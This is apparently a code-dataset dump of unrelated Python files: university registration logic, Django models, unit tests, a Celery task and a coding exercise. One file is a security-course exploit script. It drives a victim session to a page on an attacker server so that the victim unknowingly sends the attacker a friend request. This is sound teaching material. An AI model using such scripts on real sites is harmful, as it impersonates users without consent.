    # Registration-window booleans are computed once and cached on the
    # request (see get_reg_data).
    reg_data = get_reg_data(now, request)
    data = {
        "is_after_7d_before_last_instruction":
        is_after_7d_before_last_instruction(now, request),
        # The term record switches at the grade submission deadline, so
        # "before the new term's first day" equals "after the previous
        # term's grade submission deadline".
        "is_after_grade_submission_deadline":
        is_before_bof_term(now, request),
        "is_after_last_day_of_classes":
        not is_before_last_day_of_classes(now, request),
        "is_after_start_of_registration_display_period":
        reg_data["after_start"],
        "is_after_start_of_summer_reg_display_period1":
        reg_data["after_summer1_start"],
        "is_after_start_of_summer_reg_display_periodA":
        reg_data["after_summerA_start"],
        "is_before_eof_7days_of_term":
        is_before_eof_7d_after_class_start(now, request),
        "is_before_end_of_finals_week":
        is_before_eof_finals_week(now, request),
        # NOTE(review): the "before_end" keys reuse the "after_start"
        # values because get_reg_data tests a single combined window —
        # looks intentional, but verify.
        "is_before_end_of_registration_display_period":
        reg_data["after_start"],
        "is_before_end_of_summer_reg_display_periodA":
        reg_data["after_summerA_start"],
        "is_before_end_of_summer_reg_display_period1":
        reg_data["after_summer1_start"],
        "is_before_first_day_of_term":
        is_before_bof_term(now, request),
        "is_before_last_day_of_classes":
        is_before_last_day_of_classes(now, request),
        "myplan_peak_load": during_myplan_peak_load(now, request),
        "reg_period1_started": reg_data["period1_started"],
        "is_summer": is_in_summer_quarter(request),
        "is_after_summer_b": is_in_summer_b_term(request),
        "in_coursevel_fetch_window": in_coursevel_fetch_window(request),
        "comparison_date": get_comparison_datetime(request)
    }
    try:
        # Previous-term identifiers used by grade/eval cards.
        last_term = get_previous_quarter(request)
        data["current_summer_term"] = "{},summer".format(last_term.year)
        data["last_term"] = "{},{}".format(last_term.year, last_term.quarter)
    except Exception:
        # Best-effort: the core flags above are still usable without them.
        log_err(logger, "get_previous_quarter", traceback, request)
    return data
def is_before_bof_term(now, request):
    """
    The term switches after the grade submission deadline.
    @return true if it is before the beginning of the 1st day of instruction
    """
    # Evaluate the dao lookup once; the original called it three times
    # (twice for the debug line, once for the return value).
    class_start = get_bod_current_term_class_start(request)
    is_before = now < class_start
    # Lazy %-args: only rendered when debug logging is enabled.
    logger.debug("%s is_before_bof_term %s ==> %s",
                 now, class_start, is_before)
    return is_before
def is_before_eof_7d_after_class_start(now, request):
    """
    @return true if it is before the end of the 7 days
    after the instruction start day
    """
    # Evaluate the dao lookup once instead of three times.
    cutoff = get_eod_7d_after_class_start(request)
    is_before = now < cutoff
    logger.debug("%s is_before_eof_7d_after_class_start %s ==> %s",
                 now, cutoff, is_before)
    return is_before
def is_after_7d_before_last_instruction(now, request):
    """
    @return true if it is after the beginning of 7 days
    before instruction end
    """
    # Evaluate the dao lookup once instead of three times.
    window_start = get_bod_7d_before_last_instruction(request)
    is_after = now > window_start
    logger.debug("%s is_after_7d_before_last_instruction %s ==> %s",
                 now, window_start, is_after)
    return is_after
def is_before_last_day_of_classes(now, request):
    """
    @return true if it is before the end of the last day of classes
    """
    # Evaluate the dao lookup once instead of three times.
    cutoff = get_eod_current_term_last_instruction(request)
    is_before = now < cutoff
    logger.debug("%s is_before_last_day_of_classes %s ==> %s",
                 now, cutoff, is_before)
    return is_before
def is_before_eof_finals_week(now, request):
    """
    @return true if it is before the end of the last day of finals week
    """
    # Evaluate the dao lookup once instead of three times.
    cutoff = get_eod_current_term_last_final_exam(request)
    is_before = now < cutoff
    logger.debug("%s is_before_eof_finals_week %s ==> %s",
                 now, cutoff, is_before)
    return is_before
def during_myplan_peak_load(now, request):
    """True when *now* is inside a MyPlan registration peak-load window
    for any of the terms considered by get_reg_data."""
    peak = get_reg_data(now, request)["myplan_peak_load"]
    logger.debug("{} myplan_peak_load ==> {}".format(now, peak))
    return peak
def get_reg_data(now, request):
    """
    now is the second after mid-night
    """
    # Memoized on the request: all callers within one request share it.
    if hasattr(request, "myuw_reg_data"):
        return request.myuw_reg_data
    term_reg_data = {
        "after_start": False,
        "after_summer1_start": False,
        "after_summerA_start": False,
        "period1_started": False,
        "myplan_peak_load": False
    }
    # get_term_reg_data only ever flips flags to True, so calling it for
    # several terms effectively ORs their windows together.
    next_term = get_next_quarter(request)
    get_term_reg_data(now, next_term, term_reg_data)
    # We need to show this term's registration stuff, because
    # the period 2 stretches past the grade submission deadline
    current_term = get_current_quarter(request)
    get_term_reg_data(now, current_term, term_reg_data)
    # We also need to be able to show the term after next, in spring quarter
    term_after_next = get_term_after(next_term)
    get_term_reg_data(now, term_after_next, term_reg_data)
    request.myuw_reg_data = term_reg_data
    return term_reg_data
def is_term_myplan_peak(now, term, data):
    """Return True when *now* falls in the MyPlan peak-load window:
    5:30-6:30am (inclusive) on any day within *term*'s registration
    period 1.

    *data* is unused; the parameter is kept for signature compatibility
    with existing callers (get_term_reg_data).
    """
    # Chained comparisons replace the original nested range checks.
    if not (term.registration_period1_start <= now.date() <=
            term.registration_period1_end):
        return False
    peak_start = datetime(now.year, now.month, now.day, 5, 30, 0)
    peak_end = datetime(now.year, now.month, now.day, 6, 30, 0)
    return peak_start <= now <= peak_end
def get_term_reg_data(now, term, data):
    """Flip the registration-window flags in *data* to True where *now*
    falls inside *term*'s display windows.  Flags are only ever set to
    True here (except myplan_peak_load when the term has no period 1),
    so repeated calls for several terms OR their windows together.
    """
    if term.registration_period1_start is None:
        data["myplan_peak_load"] = False
        return
    # Keep a True peak flag from an earlier term's check.
    if not (data["myplan_peak_load"] is True):
        data["myplan_peak_load"] = is_term_myplan_peak(now, term, data)
    now = now.date()
    # NOTE(review): nesting below reconstructed from whitespace-stripped
    # source — the period1_started checks are assumed to sit inside each
    # window branch; verify against the repository.
    if term.quarter == "summer":
        # Summer A-term window: 7 days either side of period 1 start.
        if now >= term.registration_period1_start - timedelta(days=7) and\
                now < term.registration_period1_start + timedelta(days=7):
            data["after_summerA_start"] = True
            data["before_summerA_end"] = True
            if now >= term.registration_period1_start:
                data["period1_started"] = True
        # Summer 1 window: from 7 days after period 1 start until 7 days
        # after period 2 start.
        elif now >= term.registration_period1_start + timedelta(days=7) and\
                now < term.registration_period2_start + timedelta(days=7):
            data["after_summer1_start"] = True
            data["before_summer1_end"] = True
            if now >= term.registration_period1_start:
                data["period1_started"] = True
    else:
        # Regular quarters: 14 days before period 1 start until 7 days
        # after period 2 start.
        if now >= term.registration_period1_start - timedelta(days=14) and\
                now < term.registration_period2_start + timedelta(days=7):
            data["after_start"] = True
            data["before_end"] = True
            if now >= term.registration_period1_start:
                data["period1_started"] = True
def set_js_overrides(request, values):
    """Copy any recognized override flags from the request session into
    *values*, replacing the computed card-visibility booleans.  Used by
    tests/devtools to force specific card states."""
    overrides = {
        'myuw_after_submission': 'is_after_grade_submission_deadline',
        'myuw_after_last_day': 'is_after_last_day_of_classes',
        'myuw_after_reg': 'is_after_start_of_registration_display_period',
        'myuw_before_finals_end': 'is_before_end_of_finals_week',
        'myuw_before_last_day': 'is_before_last_day_of_classes',
        'myuw_before_end_of_reg_display':
            'is_before_end_of_registration_display_period',
        'myuw_before_first_day': 'is_before_first_day_of_term',
        'myuw_before_end_of_first_week': 'is_before_eof_7days_of_term',
        'myuw_after_eval_start': 'is_after_7d_before_last_instruction',
        'myplan_peak_load': 'myplan_peak_load',
        'myuw_in_coursevel_fetch_window': 'in_coursevel_fetch_window',
    }
    session = request.session
    for session_key, value_key in overrides.items():
        if session_key in session:
            values[value_key] = session[session_key]
| 40.088983 | 79 | 0.702146 | 1,310 | 9,461 | 4.619084 | 0.125191 | 0.039663 | 0.027764 | 0.034209 | 0.596596 | 0.52074 | 0.430507 | 0.332177 | 0.174021 | 0.128078 | 0 | 0.010154 | 0.208857 | 9,461 | 235 | 80 | 40.259574 | 0.798263 | 0.103689 | 0 | 0.107784 | 1 | 0 | 0.225003 | 0.133517 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077844 | false | 0 | 0.041916 | 0.005988 | 0.203593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05dc9e06abce6cc09cc36c86c50ef30f13b3073b | 5,140 | py | Python | src/api/models.py | ppknUWr/backend-bbz | 5ee82737d4c65be109677ec9485ec7f59aae62bf | [
"Apache-2.0"
] | 1 | 2021-03-03T19:12:26.000Z | 2021-03-03T19:12:26.000Z | src/api/models.py | ppknUWr/backend-bbz | 5ee82737d4c65be109677ec9485ec7f59aae62bf | [
"Apache-2.0"
] | 10 | 2021-03-01T16:11:29.000Z | 2021-10-04T18:36:33.000Z | src/api/models.py | ppknUWr/backend-bbz | 5ee82737d4c65be109677ec9485ec7f59aae62bf | [
"Apache-2.0"
] | null | null | null | from django.db import models
import api.json_worker as json_worker
"""
ABSTRACT MODEL
Class BibliographyTemplateModel
Handles all fields that are in our bibliography databases.
"""
class BibliographyTemplateModel(models.Model):
    """Abstract base model declaring every field shared by the dynamically
    created bibliography tables (see NewBibliographyDynamicModel below).

    The verbose_name values are Polish because they are shown verbatim in
    the admin UI — do not translate them.
    """
    # FIELDS GO HERE
    id = models.IntegerField(primary_key=True) # 1 - record ID (integer)
    book_author = models.CharField(default = "Bez autora", max_length=512, verbose_name = "Autor książki") # 2.5 - Author (book author)
    co_authors = models.CharField(max_length=256, default = "Bez współtwórcy.", verbose_name = "Współtwórca") # 3 - Co-author (string)
    editor = models.CharField(max_length = 256, default = "Bez redaktora.", verbose_name = "Redaktor") # 4 - Editor (string)
    title = models.TextField(default = "Brak Tytułu.", verbose_name = "Tytuł") # 5 - Title (string)
    subtitle = models.TextField(default = "Bez podtytułu", verbose_name = "Podtytuł") # 6 - Subtitle (string)
    original_edition = models.TextField(default = "Bez wydania oryginalnego.", verbose_name = "Wydanie oryginalne") # 7 - Original edition (string)
    series = models.TextField(default = "Bez numeru serii.", verbose_name = "Numer serii") # 8 - Series number (string?)
    publication_date = models.TextField(default = "Brak roku wydania.", verbose_name = "Rok wydania") # 9 - Year of publication (TextField, string)
    publication = models.TextField(default = "Bez wydania.", verbose_name = "Wydanie") # 10 - Edition (string)
    publication_place = models.TextField(default = "Bez miejsca wydania.", verbose_name = "Miejsce wydania") # 11 - Place of publication (string)
    publisher = models.TextField(default = "Bez wydawcy.", verbose_name = "Wydawca") # 12 - Publisher (string)
    source = models.TextField(default = "Bez źródła.", verbose_name = "Źródło") # 13 - Source (string)
    number = models.TextField(default = "Bez numeru.", verbose_name = "Numer") # 14 - Number (string)
    notebook = models.TextField(default = "Bez zeszytu.", verbose_name = "Zeszyt") # 15 - Issue/notebook (string)
    pages = models.TextField(default = "0", verbose_name = "Ilość stron") # 16 - Pages (TextField (string))
    language = models.TextField(default = "Bez języka.", verbose_name = "Język") # 17 - Language (string)
    isbn_or_issn_number = models.TextField(default = "Bez numeru ISBN/ISSN.", verbose_name = "Numer ISBN/ISSN") # 18 - ISBN/ISSN number (string)
    doi_number = models.TextField(default = "Bez numeru DOI.", verbose_name = "Numer DOI") # 19 - DOI number (string)
    link = models.URLField(max_length=1024, verbose_name = "Link/Załącznik") # 20 - Link/attachment (URLField)
    keywords_and_content = models.TextField(default = "Bez słów kluczowych/zawratości.", verbose_name = "Słowa kluczowe") # 21 - Keywords, content (string)
    comments = models.TextField(default = "Bez komentarzy.", verbose_name = "Komentarze") # 22 - Comments (string)

    def __str__(self):
        # Rows are identified by their title in admin listings.
        return self.title

    class Meta:
        abstract = True
        # NOTE(review): placeholder value — overwritten per dynamic model
        # at import time (see the bottom of this module).
        verbose_name_plural = "Test"
"""
Class NewBibliographyDynamicModel
Class handle method to CREATE new dynamic model from BibliographyTemplateModel
"""
class NewBibliographyDynamicModel(object):
    """Factory disguised as a class: "instantiating" it returns a new
    Django model CLASS (not an instance) derived from the given abstract
    base and bound to the given database table name.  Results are memoized
    per table name, so repeated calls return the same class object.
    """
    # Cache: table name -> generated model class.
    _instance = dict()

    def __new__(cls, base_cls, tb_name):
        """
        Create Class
        :param base_cls: class name
        :param tb_name: table name
        :return:
        """
        new_cls_name = tb_name
        if new_cls_name not in cls._instance:
            # NOTE(review): this mutates the SHARED base Meta class rather
            # than copying it — all generated models reuse one Meta object,
            # each type() call re-reading db_table at creation time.
            new_meta_cls = base_cls.Meta
            new_meta_cls.db_table = tb_name
            model_cls = type(str(new_cls_name), (base_cls,),
                             {'__tablename__': tb_name, 'Meta': new_meta_cls, '__module__': cls.__module__})
            cls._instance[new_cls_name] = model_cls
        return cls._instance[new_cls_name]
"""
Model to save meta data about the models available
"""
class MetaDBInfo(models.Model):
    """Bookkeeping table: one row per dynamically created bibliography
    database, recording its display name, real table name, and author.
    """
    # we need id, db_name, db_name to show, name of the Author
    id = models.AutoField(primary_key=True) # 1 - record ID (integer)
    db_name = models.CharField(max_length=200)       # name shown to users
    real_db_name = models.CharField(max_length=200)  # underlying table name
    author = models.CharField(max_length=50)         # database author

    def __str__(self) -> str:
        # Bug fix: identify the row itself instead of returning a constant
        # class description, so admin listings show a meaningful label.
        return self.db_name
"""
Initialise all models - initialise dynamic models
"""
meta_info = MetaDBInfo()
models = list() # List handles all models loaded, and pass to admin.py & serializers.py, it's really important list
models_from_json = json_worker.get_models("/data/models.json") # IMPORTANT: Function from json_worker.py
# models_from_json["models"] = sorted(models_from_json["models"]) # Keep the correct order in models, even when someone mades a typo and create a new model at the end of models.json with "a" on start
for model in models_from_json["models"]:
model = NewBibliographyDynamicModel(BibliographyTemplateModel, model) # Initialise new DynamicModel
model._meta.verbose_name_plural = model._meta.db_table # IMPORTANT: Set name of table in Django Admin Panel to table name - remove extra "s" from name.
models.append(model) # Append new dynamc model to list, to pass it to admin.py
| 54.105263 | 199 | 0.70642 | 661 | 5,140 | 5.30711 | 0.334342 | 0.072121 | 0.106613 | 0.099772 | 0.143387 | 0.116306 | 0.057583 | 0 | 0 | 0 | 0 | 0.014054 | 0.183268 | 5,140 | 94 | 200 | 54.680851 | 0.821582 | 0.242802 | 0 | 0 | 0 | 0 | 0.17557 | 0.006353 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054545 | false | 0 | 0.036364 | 0.036364 | 0.709091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
05dcbb2c4c239f9b4a8fbabeb170702515971f70 | 1,296 | py | Python | tests/test_strategy.py | zozzz/yapic.di | 83488a84c0429b593d42e4d622c94dcb130bffa5 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/test_strategy.py | zozzz/yapic.di | 83488a84c0429b593d42e4d622c94dcb130bffa5 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/test_strategy.py | zozzz/yapic.di | 83488a84c0429b593d42e4d622c94dcb130bffa5 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | import pytest
from yapic.di import Injector, InjectError, VALUE, FACTORY, SCOPED_SINGLETON, SINGLETON
def test_strategy_value():
injector = Injector()
provided = "VALUE"
injector.provide("V", provided, VALUE)
assert injector["V"] == "VALUE"
assert injector["V"] is provided
assert injector.provide("V", provided, VALUE)(injector) == "VALUE"
def test_strategy_custom():
cscope = dict()
def custom_strategy(injectable, injector):
try:
return cscope[injectable]
except KeyError:
value = cscope[injectable] = injectable(injector)
return value
class A:
pass
injector = Injector()
injector.provide(A, A, custom_strategy)
assert isinstance(injector[A], A)
assert injector[A] is injector[A]
def test_strategy_scoped_singleton():
class A:
pass
injector = Injector()
injector.provide(A, A, SCOPED_SINGLETON)
assert isinstance(injector[A], A)
assert injector[A] is injector[A]
assert injector[A] is injector[A]
def test_strategy_singleton():
class A:
pass
injector = Injector()
injector.provide(A, A, SINGLETON)
assert isinstance(injector[A], A)
assert injector[A] is injector[A]
assert injector[A] is injector[A]
| 22.736842 | 87 | 0.657407 | 153 | 1,296 | 5.48366 | 0.202614 | 0.139452 | 0.089392 | 0.095352 | 0.549464 | 0.480334 | 0.480334 | 0.480334 | 0.480334 | 0.429082 | 0 | 0 | 0.238426 | 1,296 | 56 | 88 | 23.142857 | 0.850051 | 0 | 0 | 0.461538 | 0 | 0 | 0.01466 | 0 | 0 | 0 | 0 | 0 | 0.282051 | 1 | 0.128205 | false | 0.076923 | 0.051282 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
05dceb631e9e5e43e026255950937e80b089bb03 | 1,251 | py | Python | Projects/1/Analysis/10/Exploit.py | Opty-MISCE/SS | 2010a7f93fdcaa50f835d827e531dc636abfe299 | [
"MIT"
] | null | null | null | Projects/1/Analysis/10/Exploit.py | Opty-MISCE/SS | 2010a7f93fdcaa50f835d827e531dc636abfe299 | [
"MIT"
] | null | null | null | Projects/1/Analysis/10/Exploit.py | Opty-MISCE/SS | 2010a7f93fdcaa50f835d827e531dc636abfe299 | [
"MIT"
] | null | null | null | from requests import session, get
from random import randint
from sys import argv
from Common.Driver import runScript
SERVER = argv[1]
attackerSERVER = "http://web.tecnico.ulisboa.pt/ist190774/SSof/R2Ai2t0bslrVyMxUOUyO.html"
victimSession = session()
victimUsername = str(randint(2 ** 27, 2 ** 28))
victimPassword = str(randint(2 ** 27, 2 ** 28))
attackerSession = session()
attackerUsername = "Attacker"
attackerPassword = str(randint(2 ** 27, 2 ** 28))
# Cleaning DB
r = get(SERVER + "/init")
assert "Initialisation DONE!" in r.text
data = {
"username": attackerUsername,
"password": attackerPassword
}
r = attackerSession.post(SERVER + "/register", data=data)
assert "Welcome" in r.text
assert attackerUsername in r.text
data = {
"username": victimUsername,
"password": victimPassword
}
r = victimSession.post(SERVER + "/register", data=data)
assert "Welcome" in r.text
assert victimUsername in r.text
# The Victim Browser Executes the Malicious Script
# And Make a Friend Request to the Attacker Impersonating the Victim
runScript(SERVER, attackerSERVER, victimSession)
r = attackerSession.get(SERVER + "/pending_requests")
assert victimUsername in r.text
print("Success!")
victimSession.close()
attackerSession.close()
| 25.530612 | 89 | 0.745803 | 153 | 1,251 | 6.091503 | 0.437909 | 0.019313 | 0.045064 | 0.041845 | 0.255365 | 0.16309 | 0.111588 | 0.111588 | 0.111588 | 0.111588 | 0 | 0.026022 | 0.139888 | 1,251 | 48 | 90 | 26.0625 | 0.840149 | 0.101519 | 0 | 0.176471 | 0 | 0 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 1 | 0 | false | 0.117647 | 0.117647 | 0 | 0.117647 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
05e94465c2150fd300427ccfc108c9168a7466b4 | 315 | py | Python | mall/celery_tasks/sms/tasks.py | DanaLee1990/meiduo | a2342cfd35829b7ef40ef3c1f1731eb95658d3e8 | [
"MIT"
] | null | null | null | mall/celery_tasks/sms/tasks.py | DanaLee1990/meiduo | a2342cfd35829b7ef40ef3c1f1731eb95658d3e8 | [
"MIT"
] | null | null | null | mall/celery_tasks/sms/tasks.py | DanaLee1990/meiduo | a2342cfd35829b7ef40ef3c1f1731eb95658d3e8 | [
"MIT"
] | null | null | null |
"""
任务:
1、就是普通函数
2、该函数必须通过celery的实例对象的tasks装饰其装饰
3、该任务需要让celery实例对象自动检测
4、任务(函数)需要使用任务名(函数名).delay() 进行调用
"""
from libs.yuntongxun.sms import CCP
from celery_tasks.main import app
@app.task
def send_sms_code(mobile,sms_code):
ccp = CCP()
ccp.send_template_sms(mobile, [sms_code, 5], 1)
| 16.578947 | 51 | 0.704762 | 46 | 315 | 4.673913 | 0.652174 | 0.097674 | 0.12093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023077 | 0.174603 | 315 | 18 | 52 | 17.5 | 0.803846 | 0.371429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
05eb0d02c233f0dee2324590bb3ea53e0d555dbd | 412 | py | Python | algorithms/reverseInteger/reverseInteger.py | zhyu/leetcode | 3c2d85b4b7a497ceffac3e562ac1a468f1f6a4b0 | [
"MIT"
] | 5 | 2015-02-18T10:17:12.000Z | 2016-11-14T19:12:21.000Z | algorithms/reverseInteger/reverseInteger.py | zhyu/leetcode | 3c2d85b4b7a497ceffac3e562ac1a468f1f6a4b0 | [
"MIT"
] | null | null | null | algorithms/reverseInteger/reverseInteger.py | zhyu/leetcode | 3c2d85b4b7a497ceffac3e562ac1a468f1f6a4b0 | [
"MIT"
] | null | null | null | class Solution:
# @return an integer
def reverse(self, x):
int_max = 2147483647
limit = int_max/10
if x > 0:
sig = 1
elif x < 0:
sig = -1
x = -x
else:
return x
y = 0
while x:
if y > limit:
return 0
y = y*10 + (x % 10)
x /= 10
return y*sig
| 19.619048 | 31 | 0.359223 | 50 | 412 | 2.92 | 0.44 | 0.082192 | 0.068493 | 0.082192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132597 | 0.56068 | 412 | 20 | 32 | 20.6 | 0.674033 | 0.043689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05ec147619d0c6c159ac7693bb807a1f37686d47 | 710 | py | Python | petstagram/petstagram/common/tests.py | batsandi/petstagram_2 | f6c2cce00862e2b6b77bfc143cc8efb55fa46735 | [
"MIT"
] | null | null | null | petstagram/petstagram/common/tests.py | batsandi/petstagram_2 | f6c2cce00862e2b6b77bfc143cc8efb55fa46735 | [
"MIT"
] | null | null | null | petstagram/petstagram/common/tests.py | batsandi/petstagram_2 | f6c2cce00862e2b6b77bfc143cc8efb55fa46735 | [
"MIT"
] | null | null | null | import unittest
from django.core.exceptions import ValidationError
from petstagram.common.validators import MaxFileSizeInMbValidator
class FakeFile:
size = 5
class FakeImage:
file = FakeFile()
class MaxFileSizeInMbValidatorTests(unittest.TestCase):
def test_when_file_is_bigger__expect_to_raise(self):
validator = MaxFileSizeInMbValidator(0.000001)
file = FakeImage()
with self.assertRaises(ValidationError) as context:
validator(file)
self.assertIsNotNone(context.exception)
def test_when_file_size_is_valid__expect_to_do_nothing(self):
validator = MaxFileSizeInMbValidator(1)
file = FakeImage()
validator(file)
| 22.1875 | 65 | 0.73662 | 73 | 710 | 6.917808 | 0.561644 | 0.027723 | 0.043564 | 0.059406 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015845 | 0.2 | 710 | 31 | 66 | 22.903226 | 0.873239 | 0 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.111111 | false | 0 | 0.166667 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
05ed9a57f5af4fea6ddb8a36da3aa0e080bf2206 | 2,348 | py | Python | src/third_party/swiftshader/third_party/subzero/pydir/gen_test_arith_ll.py | rhencke/engine | 1016db292c4e73374a0a11536b18303c9522a224 | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | src/third_party/swiftshader/third_party/subzero/pydir/gen_test_arith_ll.py | rhencke/engine | 1016db292c4e73374a0a11536b18303c9522a224 | [
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | src/third_party/swiftshader/third_party/subzero/pydir/gen_test_arith_ll.py | rhencke/engine | 1016db292c4e73374a0a11536b18303c9522a224 | [
"BSD-3-Clause"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | def mangle(op, op_type, signed):
# suffixMap gives the C++ name-mangling suffixes for a function that takes two
# arguments of the given type. The first entry is for the unsigned version of
# the type, and the second entry is for the signed version.
suffixMap = { 'i1': ['bb', 'bb'],
'i8': ['hh', 'aa'],
'i16': ['tt', 'ss'],
'i32': ['jj', 'ii'],
'i64': ['yy', 'xx'],
'float': ['ff', 'ff'],
'double': ['dd', 'dd'],
'<4 x i32>': ['Dv4_jS_', 'Dv4_iS_'],
'<8 x i16>': ['Dv8_tS_', 'Dv8_sS_'],
'<16 x i8>': ['Dv16_hS_', 'Dv16_aS_'],
'<4 x float>': ['Dv4_fS_', 'Dv4_fS_'],
}
base = 'test' + op.capitalize()
return '_Z' + str(len(base)) + base + suffixMap[op_type][signed]
def arith(Native, Type, Op):
_TEMPLATE_ = """
define internal {{native}} @{{name}}({{native}} %a, {{native}} %b) {{{{
{trunc_a}
{trunc_b}
%result{{trunc}} = {{op}} {{type}} %a{{trunc}}, %b{{trunc}}
{zext}
ret {{native}} %result
}}}}"""
Signed = Op in {'sdiv', 'srem', 'ashr'}
Name = mangle(Op, Type, Signed)
# Most i1 operations are invalid for PNaCl, so map them to i32.
if Type == 'i1' and (Op not in {'and', 'or', 'xor'}):
Type = 'i32'
x = _TEMPLATE_.format(
trunc_a = '%a.trunc = trunc {native} %a to {type}' if
Native != Type else '',
trunc_b = '%b.trunc = trunc {native} %b to {type}' if
Native != Type else '',
zext = '%result = ' + ('sext' if Signed else 'zext') +
' {type} %result.trunc to {native}' if Native != Type else '')
lines = x.format(native=Native, type=Type, op=Op, name=Name,
trunc='.trunc' if Native != Type else '')
# Strip trailing whitespace from each line to keep git happy.
print '\n'.join([line.rstrip() for line in lines.splitlines()])
for op in ['add', 'sub', 'mul', 'sdiv', 'udiv', 'srem', 'urem', 'shl', 'lshr',
'ashr', 'and', 'or', 'xor']:
for op_type in ['i1', 'i8', 'i16', 'i32']:
arith('i32', op_type, op)
for op_type in ['i64', '<4 x i32>', '<8 x i16>', '<16 x i8>']:
arith(op_type, op_type, op)
for op in ['fadd', 'fsub', 'fmul', 'fdiv', 'frem']:
for op_type in ['float', 'double', '<4 x float>']:
arith(op_type, op_type, op)
| 41.192982 | 80 | 0.517036 | 327 | 2,348 | 3.605505 | 0.373089 | 0.061069 | 0.033927 | 0.054283 | 0.084818 | 0.06955 | 0 | 0 | 0 | 0 | 0 | 0.031524 | 0.270443 | 2,348 | 56 | 81 | 41.928571 | 0.656743 | 0.141823 | 0 | 0.085106 | 0 | 0.021277 | 0.318566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
05f53d4427176b3d7edeff38f769638cc4082c8a | 580 | py | Python | unittests/discordremotetestcase.py | gcurtis79/OctoPrint-DiscordRemote | 1af667648a5161633f5484f656783cd03858e798 | [
"MIT"
] | null | null | null | unittests/discordremotetestcase.py | gcurtis79/OctoPrint-DiscordRemote | 1af667648a5161633f5484f656783cd03858e798 | [
"MIT"
] | null | null | null | unittests/discordremotetestcase.py | gcurtis79/OctoPrint-DiscordRemote | 1af667648a5161633f5484f656783cd03858e798 | [
"MIT"
] | null | null | null | from unittest import TestCase
class DiscordRemoteTestCase(TestCase):
def assertBasicEmbed(self, embeds, title, description, color, author):
self.assertEqual(1, len(embeds))
first_embed = embeds[0].get_embed()
self.assertEqual(title, first_embed['title'])
self.assertEqual(description, first_embed['description'])
self.assertEqual(color, first_embed['color'])
self.assertIsNotNone(first_embed['timestamp'])
self.assertEqual(0, len(first_embed['fields']))
self.assertEqual(author, first_embed['author']['name'])
